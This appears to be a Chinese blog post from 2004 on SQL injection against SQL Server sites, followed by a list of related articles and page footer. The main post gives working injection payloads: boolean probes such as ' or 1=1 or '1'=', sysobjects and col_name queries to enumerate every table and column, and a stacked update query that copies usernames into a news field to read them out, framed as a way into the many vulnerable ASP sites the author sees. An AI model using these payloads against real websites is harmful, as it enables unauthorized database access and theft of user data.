专门针对SQL Server的注入手段

原创 2004年07月13日 17:35:00

小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比……

关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。

首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用' or 1=1 or '1'='。

而sql server特别的还有user>0,db_name()>0。但是这些手法都只是检测漏洞的方法,真正有用的在下面。

1、获得所有的Table表名

(Select distinct Top 1 name from sysobjects where xtype='U' and status>0 and name not in (select distinct top i name from sysobjects where xtype='U' and status>0 order by name) order by name)>0

i为一个整数,i取1时,返回第一个table name(按表名排序),2返回第二个,依此类推,直到什么都没有返回为止。

2、得到表名后再获得字段名(field name)

(Select Top 1 col_name(object_id('TableName'),i) from sysobjects)>0

这一句返回TableName这个表里第i个字段的名字

3、得到所有的表名以及里面字段名,估计对这个网站的结构也就有相应的了解了。然后怎样获得字段中的数据呢?

如果是字符串,自然用>0的技俩,如果是其它类型,那就找一个新闻之类的表,再用

;update news set caption=(select username from users where id=9) where newsid=100;--  之类的方法把你要的数据写出来,这样基本上就没有你不知道的内容了。

我自己用VB做了个软件,自动获得表名和字段名,速度极快,瞬间整个数据库的结构就出来了。

当然这些不过是sql语句的构造而已,没什么过多的技术,另外这一个网页也是sql server injection必备的哟http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_tsqlcon_6lyk.asp

SQL注入式攻击方式及防范措施

SQL注入式攻击方式及防范措施 转载于 http://hi.baidu.com/xjzxjym/item/8efed742124798ad60d7b916 谨以此文献给那些网站受害者。。。。。...
  • hysfwjr
  • hysfwjr
  • 2013年06月23日 19:53
  • 482

TP仿sql注入

二、仿sql注入 SEO:  1,如果优化的话 title部分是非常重要的,用来优化我们网站的关键字的 搜索引擎会根据关键字对你的网站归类,如果网站权重高的话,当用户搜索关键字的时候,会先看到...
  • whjwhja6
  • whjwhja6
  • 2013年05月31日 23:03
  • 858

SQL server手工注入学习笔记

MSSQL注入(SQL server) 由于这学期正在学数据库,所以理解SQL语句还是可疑的。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。 一:判断是否有注入 ...
  • qq_32360995
  • qq_32360995
  • 2017年05月07日 12:27
  • 872

SQL注入—我是如何一步步攻破一家互联网公司的

最近在研究Web安全相关的知识,特别是SQL注入类的相关知识。接触了一些与SQL注入相关的工具。周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞。不试不知道,一...
  • xiongshengwu
  • xiongshengwu
  • 2016年12月16日 18:45
  • 2196

防止sql注入的存储过程

-- Function: fn_escapecmdshellstring-- Description: Returns an escaped version of a given string--  ...
  • meiqingsong
  • meiqingsong
  • 2005年04月08日 16:57
  • 1828

Web攻击手段之XSS攻击,CRSF, SQL注入攻击

Web攻击手段之XSS攻击,CRSF, SQL注入攻击       1.  XSS攻击        XSS攻击的全称是跨站脚本攻击,指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页...
  • chenglinhust
  • chenglinhust
  • 2016年06月05日 11:46
  • 1405

常见十大web攻击手段

http://zhengj3.blog.51cto.com/6106/290728 常见针对 Web 应用攻击的十大手段 目前常用的针对应用漏洞的攻击已经多达几百种,最为常见的攻击为下表列出的...
  • ccecwg
  • ccecwg
  • 2014年11月17日 15:02
  • 594

Sql Server存储过程防注入攻击

所谓Sql注入,就是利用动态构建Sql语句的操作,在输入参中增加额外sql信息从而在执行该操作时顺带进行 额外的地数据库操作的攻击方式。 使用存储过程可以很大程度上避免Sql注入攻...
  • heartrude
  • heartrude
  • 2012年04月02日 07:18
  • 2046

防止xss攻击与sql注入

XSS xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中...
  • JACKGAOLEI
  • JACKGAOLEI
  • 2016年03月28日 13:52
  • 1992

什么叫做SQL注入式攻击,如何防范?

所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串中,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为...
  • hellochenlu
  • hellochenlu
  • 2016年08月13日 17:04
  • 1000
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:专门针对SQL Server的注入手段
举报原因:
原因补充:

(最多只允许输入30个字)